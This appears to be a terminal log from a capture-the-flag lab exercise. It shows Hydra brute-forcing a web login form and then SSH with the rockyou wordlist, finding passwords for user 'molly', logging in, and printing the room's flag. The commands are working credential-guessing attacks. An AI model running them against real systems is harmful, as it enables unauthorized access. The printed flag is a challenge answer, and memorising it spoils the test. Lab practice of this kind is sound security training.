# ── Attack 1: HTTP POST Form ─────────────────
└─# hydra -l molly -P /usr/share/wordlists/rockyou.txt 10.10.X.X http-post-form "/login:username=^USER^&password=^PASS^:F=incorrect" -V -t 4
Hydra v9.4 starting at 2025-01-01
[DATA] attacking http-post-form://10.10.X.X:80/login
[ATTEMPT] target 10.10.X.X - login "molly" - pass "123456"
[ATTEMPT] target 10.10.X.X - login "molly" - pass "iloveyou"
[80][http-post-form] host: 10.10.X.X login: molly password: sunshine
# ── Attack 2: SSH ────────────────────────────
└─# hydra -l molly -P /usr/share/wordlists/rockyou.txt 10.10.X.X ssh -t 4
[DATA] attacking ssh://10.10.X.X:22/
[22][ssh] host: 10.10.X.X login: molly password: butterfly
└─# ssh molly@10.10.X.X
molly@10.10.X.X's password: butterfly
molly@ip:~$ cat flag2.txt
THM{c8eeb0468febbadea859baeb33b2541b}
└─#